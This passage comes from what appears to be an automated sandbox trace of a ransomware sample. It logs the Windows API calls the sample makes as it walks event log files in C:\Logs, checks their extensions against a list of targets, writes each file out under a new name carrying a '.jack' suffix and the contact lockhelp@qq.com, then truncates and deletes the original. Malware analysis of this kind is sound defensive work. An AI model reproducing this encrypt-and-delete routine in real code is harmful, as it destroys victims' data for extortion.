app-Deployment.evtx") returned 65 [0205.981] lstrlenW (lpString=".1cd") returned 4 [0205.981] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.981] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 65 [0205.981] lstrlenW (lpString=".jpg") returned 4 [0205.981] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.981] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.981] lstrlenW (lpString="Microsoft-Windows-AppReadiness%4Operational.evtx") returned 48 [0205.981] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.984] GetFileSizeEx (in: hFile=0x418, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=1118208) returned 1 [0205.984] CloseHandle (hObject=0x418) returned 1 [0205.984] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx")) returned 0x20 [0205.984] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.984] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.984] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.984] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.984] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0205.985] GetLastError () returned 0x0 [0205.985] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0206.169] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0206.226] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11010, lpOverlapped=0x0) returned 1 [0206.336] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11020, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11020, lpOverlapped=0x0) returned 1 [0207.069] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.070] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x134, lpOverlapped=0x0) returned 1 [0207.070] SetEndOfFile (hFile=0x424) returned 1 [0207.070] CloseHandle (hObject=0x424) returned 1 [0207.110] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.110] SetEndOfFile (hFile=0x418) returned 1 [0207.112] CloseHandle (hObject=0x418) returned 1 [0207.112] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.112] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx")) returned 1 [0207.112] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.112] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.112] lstrlenW (lpString=".doc") returned 4 [0207.112] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.112] lstrlenW (lpString=".docx") returned 5 [0207.112] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.112] lstrlenW (lpString=".pdf") returned 4 [0207.112] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.112] lstrlenW (lpString=".xls") returned 4 [0207.112] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.112] lstrlenW (lpString=".xlsx") returned 5 [0207.113] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.113] lstrlenW (lpString=".ppt") returned 4 [0207.113] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.113] lstrlenW (lpString=".zip") returned 4 [0207.113] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.113] lstrlenW (lpString=".rar") returned 4 [0207.113] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.113] lstrlenW (lpString=".bz2") returned 4 [0207.113] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.113] lstrlenW (lpString=".7z") returned 3 [0207.113] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.113] lstrlenW (lpString=".dbf") returned 4 [0207.113] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.113] lstrlenW (lpString=".1cd") returned 4 [0207.113] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.113] lstrlenW (lpString=".jpg") returned 4 [0207.113] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.113] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.113] lstrlenW (lpString=".doc") returned 4 [0207.113] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.113] lstrlenW (lpString=".docx") returned 5 [0207.113] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.113] lstrlenW (lpString=".pdf") returned 4 [0207.113] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.113] lstrlenW (lpString=".xls") returned 4 [0207.113] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.113] lstrlenW (lpString=".xlsx") returned 5 [0207.114] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.114] lstrlenW (lpString=".ppt") returned 4 [0207.114] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.114] lstrlenW (lpString=".zip") returned 4 [0207.114] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.114] lstrlenW (lpString=".rar") returned 4 [0207.114] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.114] lstrlenW (lpString=".bz2") returned 4 [0207.114] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.114] lstrlenW (lpString=".7z") returned 3 [0207.114] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.114] lstrlenW (lpString=".dbf") returned 4 [0207.114] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.114] lstrlenW (lpString=".1cd") returned 4 [0207.114] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 56 [0207.114] lstrlenW (lpString=".jpg") returned 4 [0207.114] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.114] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.114] lstrlenW (lpString="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 64 [0207.114] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.183] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0207.183] CloseHandle (hObject=0x3e4) returned 1 [0207.185] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx")) returned 0x20 [0207.185] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.185] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.185] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.185] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.185] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0207.186] GetLastError () returned 0x0 [0207.186] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.191] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.193] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.193] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x154, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x154, lpOverlapped=0x0) returned 1 [0207.193] SetEndOfFile (hFile=0x404) returned 1 [0207.193] CloseHandle (hObject=0x404) returned 1 [0207.197] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.197] SetEndOfFile (hFile=0x3e4) returned 1 [0207.199] CloseHandle (hObject=0x3e4) returned 1 [0207.199] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.199] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx")) returned 1 [0207.200] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.200] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.200] lstrlenW (lpString=".doc") returned 4 [0207.200] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.200] lstrlenW (lpString=".docx") returned 5 [0207.200] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.200] lstrlenW (lpString=".pdf") returned 4 [0207.200] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.200] lstrlenW (lpString=".xls") returned 4 [0207.200] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.200] lstrlenW (lpString=".xlsx") returned 5 [0207.200] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.200] lstrlenW (lpString=".ppt") returned 4 [0207.200] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.200] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.200] lstrlenW (lpString=".zip") returned 4 [0207.200] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.200] lstrlenW (lpString=".rar") returned 4 [0207.200] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.200] lstrlenW (lpString=".bz2") returned 4 [0207.200] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.200] lstrlenW (lpString=".7z") returned 3 [0207.200] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.201] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.201] lstrlenW (lpString=".dbf") returned 4 [0207.201] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.201] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.201] lstrlenW (lpString=".1cd") returned 4 [0207.201] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.201] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.201] lstrlenW (lpString=".jpg") returned 4 [0207.201] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.201] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.201] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.201] lstrlenW (lpString=".doc") returned 4 [0207.201] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.201] lstrlenW (lpString=".docx") returned 5 [0207.201] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.201] lstrlenW (lpString=".pdf") returned 4 [0207.201] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.201] lstrlenW (lpString=".xls") returned 4 [0207.201] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.201] lstrlenW (lpString=".xlsx") returned 5 [0207.201] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.201] lstrlenW (lpString=".ppt") returned 4 [0207.201] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.201] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.201] lstrlenW (lpString=".zip") returned 4 [0207.201] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.201] lstrlenW (lpString=".rar") returned 4 [0207.201] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.202] lstrlenW (lpString=".bz2") returned 4 [0207.202] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.202] lstrlenW (lpString=".7z") returned 3 [0207.202] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.202] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.202] lstrlenW (lpString=".dbf") returned 4 [0207.202] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.202] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.202] lstrlenW (lpString=".1cd") returned 4 [0207.202] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.202] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0207.202] lstrlenW (lpString=".jpg") returned 4 [0207.202] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.202] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.202] lstrlenW (lpString="Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 49 [0207.202] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.203] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0207.203] CloseHandle (hObject=0x3e4) returned 1 [0207.203] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx")) returned 0x20 [0207.203] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.203] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0207.203] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.203] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.203] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0207.204] GetLastError () returned 0x0 [0207.204] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.226] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.229] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.229] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x136, lpOverlapped=0x0) returned 1 [0207.230] SetEndOfFile (hFile=0x404) returned 1 [0207.230] CloseHandle (hObject=0x404) returned 1 [0207.233] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.233] SetEndOfFile (hFile=0x3e4) returned 1 [0207.235] CloseHandle (hObject=0x3e4) returned 1 [0207.235] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.235] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx")) returned 1 [0207.236] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.236] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.236] lstrlenW (lpString=".doc") returned 4 [0207.236] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.236] lstrlenW (lpString=".docx") returned 5 [0207.236] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.236] lstrlenW (lpString=".pdf") returned 4 [0207.236] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.236] lstrlenW (lpString=".xls") returned 4 [0207.236] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.236] lstrlenW (lpString=".xlsx") returned 5 [0207.236] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.236] lstrlenW (lpString=".ppt") returned 4 [0207.236] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.236] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.236] lstrlenW (lpString=".zip") returned 4 [0207.236] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.236] lstrlenW (lpString=".rar") returned 4 [0207.236] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.236] lstrlenW (lpString=".bz2") returned 4 [0207.236] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.236] lstrlenW (lpString=".7z") returned 3 [0207.237] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.237] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.237] lstrlenW (lpString=".dbf") returned 4 [0207.237] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.237] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.237] lstrlenW (lpString=".1cd") returned 4 [0207.237] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.237] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.237] lstrlenW (lpString=".jpg") returned 4 [0207.237] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.237] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.237] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.237] lstrlenW (lpString=".doc") returned 4 [0207.237] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.237] lstrlenW (lpString=".docx") returned 5 [0207.237] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.237] lstrlenW (lpString=".pdf") returned 4 [0207.237] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.237] lstrlenW (lpString=".xls") returned 4 [0207.237] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.237] lstrlenW (lpString=".xlsx") returned 5 [0207.237] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.237] lstrlenW (lpString=".ppt") returned 4 [0207.237] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.237] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.237] lstrlenW (lpString=".zip") returned 4 [0207.237] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.238] lstrlenW (lpString=".rar") returned 4 [0207.238] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.238] lstrlenW (lpString=".bz2") returned 4 [0207.238] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.238] lstrlenW (lpString=".7z") returned 3 [0207.238] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.238] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.238] lstrlenW (lpString=".dbf") returned 4 [0207.238] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.238] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.238] lstrlenW (lpString=".1cd") returned 4 [0207.238] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.238] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0207.238] lstrlenW (lpString=".jpg") returned 4 [0207.238] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.238] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.238] lstrlenW (lpString="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 49 [0207.238] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 